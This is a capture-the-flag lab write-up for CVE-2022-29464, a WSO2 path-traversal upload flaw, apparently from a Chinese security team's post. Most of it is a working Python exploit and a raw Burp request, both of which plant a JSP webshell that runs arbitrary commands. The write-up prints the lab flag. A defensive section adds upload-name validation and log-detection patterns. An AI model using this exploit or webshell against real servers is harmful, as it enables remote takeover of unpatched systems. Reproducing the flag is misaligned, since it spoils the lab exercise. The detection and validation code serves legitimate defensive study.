Yunjing range
I. Vulnerability description
Certain WSO2 products allow unrestricted file upload, which leads to remote code execution. Take WSO2 API Manager as an example: it is a fully open-source API management platform that supports API design, API publishing, lifecycle management, application development, API security, rate limiting, viewing API statistics, and connecting APIs, API products and endpoints.
II. Affected versions
2.2.0 ≤ WSO2 API Manager ≤ 4.0.0
5.2.0 ≤ WSO2 Identity Server ≤ 5.11.0
WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, 5.6.0
5.3.0 ≤ WSO2 Identity Server as Key Manager ≤ 5.10.0
6.2.0 ≤ WSO2 Enterprise Integrator ≤ 6.6.0
III. Root cause
Reference: https://forum.butian.net/share/1518
IV. Reproduction
Enter the range.
Weak credentials give direct access to the admin console.
1. EXP usage
import requests
import urllib3

# Suppress the certificate warning for the self-signed HTTPS management port.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

url = input("请输入URL:")
file = "shell.jsp"

# JSP page that runs the value of the "cmd" parameter and echoes its output.
payload = """<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
                InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        } catch(IOException e) { e.printStackTrace(); }
    }
%>
<pre><%=output %></pre>"""

# The multipart field name carries the path traversal; the upload endpoint
# writes the part to that relative path, so it lands inside the
# authenticationendpoint webapp and is served as a JSP.
files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": payload}
response = requests.post(f'{url}/fileupload/toolsAny', files=files, verify=False)
print(f"shell @ {url}/authenticationendpoint/{file}")
Usage:
Visit the webshell URL.
Run the command cat /flag directly.
Obtain flag{6baadc7f-a2fa-4252-be29-1e64ea29ffbd}
2. Using Burp
First visit https://eci-2zeejq36trw3c06lc5uf.cloudeci1.ichunqiu.com:9443/carbon/admin/login.jsp
We need to be under this directory, not under the login page that opens by default: /carbon/admin/login.jsp
Then capture the request with Burp and add the POC:
POST /fileupload/toolsAny HTTP/1.1
Host: localhost:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 729
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0

--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"

<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
                InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        } catch(IOException e) { e.printStackTrace(); }
    }
%>
<%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--
Modify the captured request directly.
When the number shown below appears, the webshell was uploaded successfully.
Visit: /authenticationendpoint/1.jsp?cmd=system('cat /flag');
Obtain flag{6baadc7f-a2fa-4252-be29-1e64ea29ffbd}
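The two reproductions above rely on the same weakness: the upload handler accepts a client-chosen part name containing "../" and writes the file to that path, so a JSP lands in a deployed webapp. As an added, defender-side example that is not part of the original writeup or of WSO2's code, the block below shows the two checks a practitioner would want: the filename validation an upload handler needs to make that impossible, and a detection pass over request-log lines that flags traversal in multipart part names, JSP uploads to the file-upload endpoint, and a "cmd" parameter sent to a JSP page. UPLOAD_ROOT, ALLOWED_EXTENSIONS, the log-line format and SAMPLE_LOG are constructed for this example and are not WSO2's real paths, settings or log format.

```python
"""Defender-side checks for the unrestricted upload described above."""
import posixpath
import re

# Constructed values for this example; they are not WSO2's real settings.
UPLOAD_ROOT = "/opt/wso2/tmp/uploads"
ALLOWED_EXTENSIONS = {".txt", ".csv", ".json", ".xml"}


def validate_upload_name(raw_name: str) -> str:
    """Map a client-supplied multipart field/filename to a path under UPLOAD_ROOT.

    Raises ValueError for anything that could escape the directory or that the
    server would later execute (for example a JSP page dropped into a webapp).
    """
    if not raw_name or "\x00" in raw_name:
        raise ValueError("empty filename or embedded NUL byte")
    # Treat backslashes as separators so "..\\" variants are caught as well.
    name = raw_name.replace("\\", "/")
    base = posixpath.basename(name)
    if base != name:
        # Any directory component (including "../") is rejected outright
        # rather than normalised and re-checked.
        raise ValueError(f"directory components not allowed: {raw_name!r}")
    if base in ("", ".", ".."):
        raise ValueError(f"invalid filename: {raw_name!r}")
    ext = posixpath.splitext(base)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: {ext!r}")
    full = posixpath.normpath(posixpath.join(UPLOAD_ROOT, base))
    # Defence in depth: confirm the resolved path is still inside the root.
    if not full.startswith(UPLOAD_ROOT + "/"):
        raise ValueError("resolved path escaped upload root")
    return full


def is_safe_upload_name(raw_name: str) -> bool:
    """Boolean convenience wrapper around validate_upload_name()."""
    try:
        validate_upload_name(raw_name)
        return True
    except ValueError:
        return False


# Constructed request-log lines (not real WSO2 logs): method, path, the
# Content-Disposition name of the first multipart part (if any), and status.
SAMPLE_LOG = [
    'POST /fileupload/toolsAny part-name="report.csv" 200',
    'POST /fileupload/toolsAny part-name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp" 200',
    'GET /authenticationendpoint/1.jsp?cmd=id 200',
    'POST /fileupload/toolsAny part-name="notes.txt" 200',
    'POST /fileupload/toolsAny part-name="page.jsp" 200',
]

# Traversal in plain or URL-encoded form, with either separator.
TRAVERSAL = re.compile(r"\.\./|\.\.\\|%2e%2e", re.IGNORECASE)
# A .jsp/.jspx part name sent to the upload endpoint.
JSP_PART = re.compile(r'part-name="[^"]*\.jspx?"', re.IGNORECASE)
# A GET to a JSP page carrying a "cmd" query parameter.
JSP_WITH_CMD = re.compile(r"^GET \S*\.jspx?\?\S*\bcmd=", re.IGNORECASE)


def find_suspicious_requests(lines):
    """Return (line_number, reason) for each log line matching one of the rules."""
    hits = []
    for n, line in enumerate(lines, 1):
        if line.startswith("POST /fileupload/"):
            if TRAVERSAL.search(line):
                hits.append((n, "path traversal in multipart filename"))
            elif JSP_PART.search(line):
                hits.append((n, "jsp file sent to upload endpoint"))
        elif JSP_WITH_CMD.search(line):
            hits.append((n, "command parameter sent to a jsp page"))
    return hits


if __name__ == "__main__":
    for name in ("report.csv", "../../x/1.jsp", "page.jsp"):
        print(f"{name!r}: {'accepted' if is_safe_upload_name(name) else 'rejected'}")
    for n, reason in find_suspicious_requests(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

The validation rejects any directory component rather than trying to normalise it, because a handler that normalises and then re-checks is easy to get wrong across separators and encodings; the extension allow-list is what stops a server-executable page from being stored even when the path is otherwise fine. The log rules are deliberately narrow (upload endpoint plus traversal or JSP name, and JSP plus "cmd=") so that they stay cheap to run and produce few false positives; the "cmd=" rule also catches the follow-up execution request when the upload itself was not logged.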
CMS source code: link: https://pan.baidu.com/s/1OMfBUhV2U2teOZAUMIm3Rg?pwd=oc74 extraction code: oc74
Originally published on the WeChat official account (XK Team): CVE-2022-29464